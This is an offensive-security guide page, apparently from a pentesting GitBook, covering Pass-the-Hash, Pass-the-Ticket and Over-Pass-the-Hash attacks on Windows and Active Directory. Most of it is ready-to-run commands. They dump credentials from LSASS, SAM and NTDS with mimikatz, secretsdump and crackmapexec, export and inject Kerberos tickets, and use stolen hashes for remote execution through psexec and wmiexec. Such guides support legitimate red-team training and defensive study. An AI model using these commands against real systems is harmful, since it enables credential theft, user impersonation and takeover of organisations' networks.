This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Pass-the-?

Pass-the-Hash (PtH) Attacks

NTLM Hash Overview

Service Purpose: NTLM hashes are used for authentication in Windows environments, especially for local and SMB authentication.

Why Target NTLM Hashes: These hashes can be used directly for authentication without needing to crack the plaintext password, enabling immediate lateral movement.

Pass-the-Hash Attack

Purpose: Use extracted NTLM hashes to authenticate to other systems without knowing the plaintext password.

Requirements: NTLM hash of user account, target systems accepting NTLM authentication

Attack Value: Immediate access to systems, works even with strong passwords, bypasses password complexity

NTLM Hash Extraction

Using Impacket Tools

# Extract NTLM hashes from compromised system
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Extract from specific registry hives
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -sam -security -system

# Extract cached credentials
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -cached

Using Mimikatz (Windows)

# Extract from LSASS memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords"

# Extract from SAM database
mimikatz "privilege::debug" "lsadump::sam"

# Extract cached credentials
mimikatz "privilege::debug" "lsadump::cache"

Using CrackMapExec

# Extract SAM hashes from multiple systems
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Extract from domain controller
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds

Pass-the-Hash Execution

Using Impacket Tools

# SMB authentication with hash
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Access file shares
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

Using CrackMapExec

# Pass-the-hash across network range
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash>

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa

Pass-the-Ticket (PtT) Attacks

Kerberos Ticket Overview

Service Purpose: Kerberos tickets (TGT/TGS) are used for authentication in Active Directory environments, providing single sign-on capabilities.

Why Target Kerberos Tickets: Valid tickets can be extracted and reused on other systems to impersonate users without needing passwords or hashes.

Pass-the-Ticket Attack

Purpose: Extract and reuse Kerberos tickets to authenticate as other users on different systems.

Requirements: Valid Kerberos tickets (TGT or TGS), target systems in same domain

Attack Value: User impersonation, session hijacking, privilege escalation

Kerberos Ticket Extraction

Using Mimikatz (Windows)

# List current tickets
mimikatz "kerberos::list"

# Export all tickets
mimikatz "kerberos::list /export"

# Extract tickets from LSASS
mimikatz "privilege::debug" "sekurlsa::tickets /export"

# Target specific user's tickets
mimikatz "kerberos::list /user:<username> /export"

Using Impacket Tools

# Extract tickets using getTGT.py (if credentials known)
python3 getTGT.py <domain>/<username>:<password>

# Extract tickets from Windows system (requires local access)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

Pass-the-Ticket Execution

Cross-Platform Ticket Conversion

# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>

Using Impacket Tools

# Set ticket in environment
export KRB5CCNAME=<ticket.ccache>

# Use ticket for authentication (no password needed)
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
python3 smbclient.py <domain>/<username>@<target-server> -k -no-pass
python3 wmiexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Inject ticket into current session
mimikatz "kerberos::ptt <ticket.kirbi>"

# Use injected ticket
dir \\<target-server>\c$
psexec \\<target-server> cmd

Over-Pass-the-Hash (Pass-the-Key)

Hybrid Authentication Overview

Service Purpose: Over-pass-the-hash leverages NTLM hashes to request Kerberos tickets, combining the benefits of both authentication methods.

Why Use Over-Pass-the-Hash: Enables Kerberos authentication using only NTLM hashes, providing better stealth and compatibility than pure NTLM authentication.

Over-Pass-the-Hash Attack

Purpose: Use NTLM hashes or AES keys to request Kerberos TGTs, then use those tickets for authentication.

Requirements: NTLM hash or AES key, access to domain controller for TGT request

Attack Value: Stealth (uses Kerberos), bypasses NTLM restrictions, enables advanced Kerberos attacks

Over-Pass-the-Hash Execution

Using Impacket Tools

# Request TGT using NTLM hash
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash>

# Request TGT using AES key
python3 getTGT.py <domain>/<username> -aesKey <AES-key>

# Use obtained TGT
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Over-pass-the-hash with NTLM
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd"

# Over-pass-the-hash with AES256
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd"

# Request TGT in new session
# In the new cmd window:
klist  # Shows TGT after first Kerberos authentication attempt
PreviousLateral MovementNextRemote Execution Techniques

Last updated

Was this helpful?